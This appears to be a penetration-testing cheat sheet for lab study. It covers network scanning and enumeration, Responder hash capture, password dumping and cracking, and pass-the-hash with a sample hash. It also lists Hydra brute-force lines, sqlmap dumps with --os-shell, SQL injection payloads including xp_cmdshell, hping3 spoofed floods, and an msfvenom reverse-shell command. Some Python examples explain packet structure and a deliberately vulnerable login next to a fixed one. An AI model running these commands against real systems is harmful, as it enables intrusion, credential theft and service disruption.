- ping URL -f -l 1500 -> Windows ping with Don't Fragment set and a 1500-byte payload; lower -l until replies come back to find the path MTU (frame size)
- tracert URL -> Determining hop count
- msfdb init
- service postgresql start
- msfconsole
- msf > db_status
- nmap -Pn -sS -A -oX Test 10.10.10.0/24
- db_import Test
- hosts -> To show all available hosts in the subnet
- db_nmap -sS -A 10.10.10.16 -> scan one host from inside msf and store its services in the database
- services -> list the services recorded for every host in the database
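What db_import actually consumes is the -oX XML written by the nmap line above. The following parser, added here as an illustration and not part of the original cheat sheet or of Metasploit, reads a constructed, trimmed-down nmaprun document (the element and attribute names are nmap's, the host data is made up) and produces the same host and service views that the msf `hosts` and `services` commands show:

```python
import xml.etree.ElementTree as ET

# Constructed, trimmed-down example of `nmap -oX` output; not a real scan result.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -sS -A -oX Test 10.10.10.0/24">
  <host>
    <status state="up"/>
    <address addr="10.10.10.16" addrtype="ipv4"/>
    <hostnames><hostname name="fileserver" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/>
        <service name="ms-wbt-server"/></port>
    </ports>
    <os><osmatch name="Linux 5.X" accuracy="95"/></os>
  </host>
  <host>
    <status state="down"/>
    <address addr="10.10.10.17" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per <host>: address, status, hostname, OS guess and port list."""
    hosts = []
    for h in ET.fromstring(xml_text).findall("host"):
        addr = next((a.get("addr") for a in h.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        hostname = h.find("hostnames/hostname")   # absent for hosts without a PTR record
        osmatch = h.find("os/osmatch")            # absent when OS detection produced nothing
        ports = []
        for p in h.findall("ports/port"):
            svc = p.find("service")
            ports.append({
                "proto": p.get("protocol"),
                "port": int(p.get("portid")),
                "state": p.find("state").get("state"),
                "name": svc.get("name") if svc is not None else None,
                # product/version only exist when -sV/-A identified the service
                "info": " ".join(filter(None, [svc.get("product"), svc.get("version")]))
                        if svc is not None else "",
            })
        hosts.append({
            "address": addr,
            "status": h.find("status").get("state"),
            "hostname": hostname.get("name") if hostname is not None else None,
            "os": osmatch.get("name") if osmatch is not None else None,
            "ports": ports,
        })
    return hosts


def live_hosts(hosts):
    """Addresses nmap reported as up (the msf `hosts` view)."""
    return [h["address"] for h in hosts if h["status"] == "up"]


def services(hosts, state="open"):
    """Flatten to (address, port, proto, name, info) rows, like the msf `services` table.
    state=None keeps filtered/closed ports as well."""
    rows = []
    for h in hosts:
        for p in h["ports"]:
            if state is None or p["state"] == state:
                rows.append((h["address"], p["port"], p["proto"], p["name"], p["info"]))
    return rows


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_NMAP_XML)
    print("hosts:", live_hosts(parsed))
    for row in services(parsed):
        print("service:", row)
```

Run it against a real `-oX` file by replacing SAMPLE_NMAP_XML with the file's contents; filtered ports are kept in the parsed data but hidden from the default service listing, which is the usual reason a port "disappears" between the raw scan and the database view.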
SMB Version Enumeration using MSF
- use scanner/smb/smb_version
- set RHOSTS 10.x.x.x-X
- set THREADS 100
- run
- hosts -> the os_flavor column is now populated from the SMB banner
SMB Commands
- nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse MACHINE_IP
- smbclient //MACHINE_IP/anonymous -> interactive access to the anonymous share (press Enter at the password prompt for a null session)
- smbget -R smb://MACHINE_IP/anonymous -> recursively download the whole share
Hping3
- Port scanning: hping3 --scan 1-3000 -S 10.10.10.10 -> --scan sets the port range to scan and -S sets the SYN flag
- Pinging the target: hping3 -c 3 10.10.10.10 -> -c 3 sends only three packets to the target machine
- UDP packet crafting: hping3 10.10.10.10 --udp --rand-source --data 500 -> UDP packets with a random spoofed source address and a 500-byte payload
- TCP SYN request: hping3 -S 10.10.10.10 -p 80 -c 5 -> -S sets the SYN flag, -p is the destination port the traffic is sent to, -c is the count of packets sent
- Flood: hping3 10.10.10.10 --flood -> send as fast as possible without displaying replies; by default this is a flagless TCP packet to port 0, add -S -p 80 for a SYN flood
Nmap
- Scan a subnet - nmap 20.0.20.0/24
- Scan targets from a text file nmap -iL list-of-ips.txt
- Scan a single Port nmap -p 22 20.0.20.1
- Scan a range of ports nmap -p 1-100 20.0.20.1
- Scan 100 most common ports (Fast) nmap -F 20.0.20.1
- Scan all 65535 ports nmap -p- 20.0.20.1
- Scan using TCP connect nmap -sT 20.0.20.1
- Scan using TCP SYN scan (default) nmap -sS 20.0.20.1
- Scan UDP ports nmap -sU -p 123,161,162 20.0.20.1
- Scan selected ports – ignore discovery nmap -Pn -F 20.0.20.1
- Detect OS and Services nmap -A 20.0.20.1
- Standard service detection nmap -sV 20.0.20.1
- nmap -O -> OS detection only
- nmap --packet-trace -> print every packet sent and received
- nmap -sT -T3 -A -> TCP connect scan, normal timing, with OS/version/script/traceroute detection
- nmap -sA -v -T4 -> ACK scan: maps firewall rules (unfiltered vs filtered), does not report open ports
- nmap -sP (now -sn) -> ping sweep, host discovery only; nmap -D RND:10 -> hide the scan among 10 random decoy sources
- nmap --mtu 8 -> fragment probes using an 8-byte MTU (the value must be a multiple of 8)
- nmap -v -sS -T5 -> SYN scan at insane timing (fast, may miss ports on slow or lossy links)
- nmap -sV -Pn -> version detection, skip host discovery (treat every host as up)
- nmap -sV -A -F -> version detection plus -A on the 100 most common ports
- nmap -p- --max-rtt-timeout 50ms -> all 65535 ports with a tight per-probe timeout; nmap -v -sS -f -T5 -> fragmented SYN scan (-f = 8-byte fragments) to slip past simple packet filters
Netdiscover
- netdiscover -i eth0 -> passive/active ARP discovery on eth0 (auto-scans common private ranges)
- netdiscover -i eth0 -r 192.168.0.0/24 -> ARP-scan a specific range (example range; -r requires a CIDR argument)
SNMP Enumeration
- nmap -sU -p 161 192.168.0.X -> is SNMP listening?
- nmap -sU -p 161 --script=snmp-brute 192.168.0.X -> brute-force community strings
- msfconsole
- use auxiliary/scanner/snmp/snmp_login -> community string brute force
- set RHOSTS 192.168.0.X, then run
- use auxiliary/scanner/snmp/snmp_enum -> dump system, users, processes and software via a valid community string
- set RHOSTS 192.168.0.X, then run
NetBIOS Enumeration
- nbtstat -A 192.168.0.X -> NetBIOS name table of the remote host
- net use -> list current connections
- net use \\192.168.0.X\e "" /user:"" -> null-session connect to share e with an empty username and password (use IPC$ for the inter-process share)
- NetBIOS Enumerator (GUI)
Enum4Linux Wins Enumeration :
- enum4linux -u user -p password -U 10.x.x.x -> Users Enumeration
- enum4linux -u user -p password -o 10.x.x.x -> OS Enumeration
- enum4linux -u user -p password -P 10.x.x.x -> Password Policy Information
- enum4linux -u user -p password -G 10.x.x.x -> Groups Information
- enum4linux -u user -p password -S 10.x.x.x -> Share Policy Information (SMB Shares Enumeration
Active Directory LDAP Enumeration : ADExplorer
- nikto -h http://target -Tuning 1 -> web server scan; tuning 1 restricts the checks to interesting files / seen in logs
Nessus runs on https://localhost:8834 (Username: admin Password: password)
- Policies > Advanced scan
- Discovery > Host Discovery > turn off "Ping the remote host"
- Port Scanning > check "Verify open TCP ports found by local port enumerators"
- Advanced > Max number of TCP sessions per host = unlimited, Max number of TCP sessions per scan = unlimited
- Credentials > Windows > Username & Password
- Save policy > Create new scan > User Defined
- Enter name & target
- Schedule tab > turn off Enabled
- Launch from the drop-down of the Save button
wfuzz: wfuzz -c -z file,common.txt --hc 404 http://site.com.br/FUZZ -> replace FUZZ with each wordlist entry, hide 404 responses
gobuster: gobuster dir -u IP_ADDRESS -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html -> directory brute force, also trying the .php and .html extensions
NTLM Hash crack
- responder -I eth0
- /usr/share/responder/logs/ -> Responder log location (captured hashes are saved per host, e.g. SMB-NTLMv2-SSP-<IP>.txt)
- john /usr/share/responder/logs/ntlm.txt -> john autodetects the NetNTLMv2 format; add --wordlist=<file> for a dictionary attack
Rainbow table crack using Winrtgen
- Open winrtgen and add new table
- Select ntlm from Hash dropdown list.
- Set Min Len as 4, Max Len as 6 and Chain Count 4000000
- Select loweralpha from Charset dropdown list (it depends upon Password).
- rcrack_gui.exe to crack hash with rainbow table
Hash dump with Pwdump7 and crack with ophcrack
- wmic useraccount get name,sid --> Get user account names and SIDs
- PwDump7.exe > c:\hashes.txt
- Replace boxes in hashes.txt with relevant usernames from step 1.
- Ophcrack.exe -> load -> PWDUMP File
- Tables -> Vista free -> select the table directory -> crack
Wireshark Filters
- Filter HTTP traffic: http.request.method == "POST", http.request.uri matches "pattern"
- Filter TCP traffic: tcp.port eq 25 or icmp, tcp.window_size == 0 && tcp.flags.reset != 1
- "ip.addr" matches against both the source and destination address in the IP header. The same is true for "tcp.port", "udp.port", "eth.addr" and others. http.request.method == "POST" -> Wireshark filter for HTTP POST requests only
Show only traffic between source and destination
- ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
- ip.src==10.20.20.5 and ip.dst==201.22.7.102
Filter (Contains)
- http.request.uri matches "gl=se$" - Note: the $ character is a PCRE punctuation character that matches the end of a string ("matches" takes a Perl-compatible regex, "contains" is a plain byte-for-byte substring test)
- http.request.uri contains admin
- tcp contains admin
- udp contains 81:60:03
- sip.To contains "a1762"
Filter TTL - ip.ttl == 64
TCPDump
- tcpdump -v -i eth0 -w capture.pcap -> capture everything on eth0 to a file
- tcpdump -v -i eth0 icmp -w icmp.pcap -> capture only ICMP
Show only traffic between source and destination
- tcpdump -vnr file.pcap host 192.168.0.X
- tcpdump -vnr file.pcap src host 192.168.0.X
- tcpdump -vnr file.pcap dst host 192.168.0.X
- tcpdump -vnr file.pcap src host 192.168.0.1 and dst host 192.168.0.2
Filter Ports
- tcpdump -vnr file.pcap port 80
Show details protocol ethernet
- tcpdump -er file.pcap
Filter Protocol
- tcpdump -vnr file.pcap udp
Filter strings
- tcpdump -nr file.pcap -A | grep "PASS" -> -A prints the payload as ASCII; without it grep never sees the FTP PASS line
== Flags TCPDump ==
[S] - SYN [S.] - SYN, ACK [.] - ACK [P.] - PSH, ACK [F.] - FIN, ACK [R] - RST
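The hping3 SYN probe above (hping3 -S 10.10.10.10 -p 80) and the tcpdump flag notation are two views of the same 40 bytes. This added example (my own illustration, not part of the cheat sheet and not hping3 or tcpdump code) builds the IPv4+TCP bytes of such a probe with correct header checksums, parses them back, renders a tcpdump-style summary line with the [S], [S.], [P.] letters, and evaluates the `host`/`port` primitives from the tcpdump lines above. The addresses are the page's lab addresses; nothing is sent on the wire.

```python
import socket
import struct


def checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum over 16-bit words (used by both IP and TCP)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


# Flag bits of TCP header byte 13, listed in the order tcpdump prints their letters.
TCP_FLAGS = [(0x01, "F"), (0x02, "S"), (0x04, "R"), (0x08, "P"),
             (0x10, "."), (0x20, "U"), (0x40, "E"), (0x80, "W")]


def flag_string(flags: int) -> str:
    """tcpdump notation: SYN -> 'S', SYN+ACK -> 'S.', ACK -> '.', PSH+ACK -> 'P.'."""
    return "".join(ch for bit, ch in TCP_FLAGS if flags & bit) or "none"


def build_syn(src, dst, sport, dport, seq=0x1000, ttl=64, ident=0x1234):
    """Bytes of an IPv4+TCP SYN probe, as hping3 -S -p <dport> would emit. Returns bytes only."""
    # TCP header: ports, seq, ack=0, data offset 5 words + SYN flag, window, checksum 0, urgent 0
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, 0, (5 << 12) | 0x02, 65535, 0, 0)
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    # IPv4 header: version 4 / IHL 5, DF flag (0x4000), protocol 6 = TCP, checksum field 0
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), ident, 0x4000, ttl, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def decode(pkt: bytes) -> dict:
    """Parse raw IPv4+TCP bytes, verify both checksums, and render a tcpdump-like summary."""
    ihl = (pkt[0] & 0x0F) * 4
    ttl, proto = pkt[8], pkt[9]
    src, dst = socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20])
    tcp = pkt[ihl:]
    sport, dport, seq = struct.unpack("!HHI", tcp[:8])
    flags = flag_string(tcp[13])
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, proto, len(tcp))
    return {
        "src": src, "dst": dst, "sport": sport, "dport": dport, "ttl": ttl, "flags": flags,
        "ip_csum_ok": checksum(pkt[:ihl]) == 0,      # a header with a valid checksum sums to 0
        "tcp_csum_ok": checksum(pseudo + tcp) == 0,
        "summary": "IP %s.%d > %s.%d: Flags [%s], seq %d" % (src, sport, dst, dport, flags, seq),
    }


def matches_filter(info: dict, host=None, port=None) -> bool:
    """Mimic tcpdump's `host X` (either address) and `port N` (either port) primitives."""
    if host is not None and host not in (info["src"], info["dst"]):
        return False
    if port is not None and port not in (info["sport"], info["dport"]):
        return False
    return True


if __name__ == "__main__":
    probe = build_syn("10.10.10.11", "10.10.10.10", 40000, 80)  # lab addresses from this page
    print(decode(probe)["summary"])
```

The checksum check is the part worth remembering when a crafted packet gets no reply: a kernel silently drops a TCP segment whose pseudo-header checksum is wrong, and --rand-source style spoofing changes the pseudo-header, so the checksum must be recomputed after every address change.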
- FTP Bruteforce with Hydra
- hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://IP
Wordpress - wpscan --url http://IP --enumerate u
Wordpress password bruteforce
msfconsole - use auxiliary/scanner/http/wordpress_login_enum
RCE - ping 127.0.0.1 | hostname | net user -> command-injection probe: if the response contains the hostname or user list, the input reaches a shell
- SQL queries
- ' or 1=1 --
- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
- ' OR '1'='1' -- (in MySQL the -- comment needs a trailing space)
- ' OR '1'='1' /*
- MySQL
- ' OR '1'='1' #
- Access (using null characters)
- ' OR '1'='1' %00
- ' OR '1'='1' %16
Using sqlmap
- Extract DBS
- sqlmap -u "http://www.example.com/viewprofile.aspx?id=1" --cookie="cookies xxx" --dbs
- Extract Tables
- sqlmap -u "http://www.example.com/viewprofile.aspx?id=1" --cookie="cookies xxx" -D example --tables
- Extract Columns
- sqlmap -u "http://www.example.com/viewprofile.aspx?id=1" --cookie="cookies xxx" -D example -T User_Login --columns
- Dump Data
- sqlmap -u "http://www.example.com/viewprofile.aspx?id=1" --cookie="cookies xxx" -D example -T User_Login --dump
- OS Shell to execute commands
- sqlmap -u "http://www.example.com/viewprofile.aspx?id=1" --cookie="cookies xxx" --os-shell
Others
- Login bypass
- blah' or 1=1 --
- Insert data into DB from login
- blah';insert into login values ('john','apple123');
- Create database from login
- blah';create database mydatabase;
- Execute cmd from login
- blah';exec master..xp_cmdshell 'ping www.target -l 65000 -t'; -- (MSSQL only; xp_cmdshell must be enabled)
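To see why the payloads above work and what stops them, here is an added example (mine, not from the cheat sheet) of a login check written the vulnerable way, the same check with bound parameters, and a stacked-query variant. It runs against an in-memory SQLite table with made-up rows; SQLite is used only because it ships with Python, and it follows the dialect notes above: the `--` payloads work, the MySQL-only `#` payload just raises a syntax error.

```python
import sqlite3


def make_db():
    """In-memory login table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO login VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "hunter2")])
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Deliberately vulnerable: user input is pasted into the SQL text."""
    sql = ("SELECT username FROM login WHERE username = '%s' AND password = '%s'"
           % (username, password))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return "SQL_ERROR"   # the payload broke the parse (e.g. a MySQL-only comment marker)
    return row[0] if row else None   # name of the first matching row = "logged in as"


def safe_login(conn, username, password):
    """Hardened: bound parameters, so the payload is compared as data and never parsed as SQL."""
    row = conn.execute("SELECT username FROM login WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


def vulnerable_stacked(conn, username, password):
    """Same concatenation, but executed where stacked statements are allowed (executescript here,
    multi-statement mode in some real drivers). Returns the row count after the request."""
    sql = ("SELECT username FROM login WHERE username = '%s' AND password = '%s';"
           % (username, password))
    conn.executescript(sql)
    return conn.execute("SELECT COUNT(*) FROM login").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    for payload in ["blah' or 1=1 --", "' OR '1'='1' --", "' OR '1'='1' /*", "' OR '1'='1' #"]:
        print("%-20r vulnerable=%-10r safe=%r" % (payload, vulnerable_login(db, payload, "x"),
                                                  safe_login(db, payload, "x")))
    print("rows after stacked insert:",
          vulnerable_stacked(db, "blah';insert into login values ('john','apple123'); --", ""))
```

The bypass succeeds because `'1'='1'` makes the WHERE clause true for every row and the comment marker swallows the password check; the parameterised version hands the same string to the engine as a value, so the quotes inside it never terminate the literal.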
Brute Force
Hydra
- hydra -L ../../User.txt -P ../../../Pass.txt ftp://< target of evaluation >
- hydra -L ../../User.txt -P ../../../Pass.txt ssh://< target of evaluation >
- hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form "/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout" -vV -f
- hydra -l admin -P /usr/share/wordlists/test.txt 192.168.80.134 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login" -vV -f
- hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://10.10.10.11
- hydra -l roger -P lists/pass.txt 192.168.56.117 -V http-post-form "/imfadministrator/:user=^USER^&pass=^PASS^:F=Invalid username."
- http-post-form argument is "path:POST body with ^USER^ and ^PASS^:condition", where the condition is a failure string (F=, the default when no prefix is given) or a success string (S=); -f stops after the first valid pair
John
PassTheHash
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.167.10 cmd -> the credential is LM:NT; aad3b435b51404eeaad3b435b51404ee is the empty LM hash, the NT hash alone is enough to authenticate
Create a login from the login form: blah';insert into login values ('john','apple123'); --
SNOW (whitespace steganography)
- snow -C -m "My swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt -> hide the message (compressed, password "magic") from readme.txt into readme2.txt
- snow -C -p "magic" readme2.txt -> extract the message
- Windows: .\SNOW.EXE -C -m "My bank account is 45656684512263" -p "magic" .\secrete_encrypt2.txt -> hide; .\SNOW.EXE -C -p "magic" .\secrete_encrypt.txt -> extract
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw -> raw PHP meterpreter reverse shell; start a matching exploit/multi/handler on LHOST:LPORT before triggering it
dir flag* /s /p -> Windows: search the current drive recursively for files named flag*, paging the output
NTFS alternate data streams
- echo "new text" > cehv11.txt:stream1 -> create cehv11.txt with the text hidden in the alternate stream stream1 (dir shows a 0-byte file)
- more < cehv11.txt:stream1 -> read the hidden stream back
- dir /r -> list files together with their alternate data streams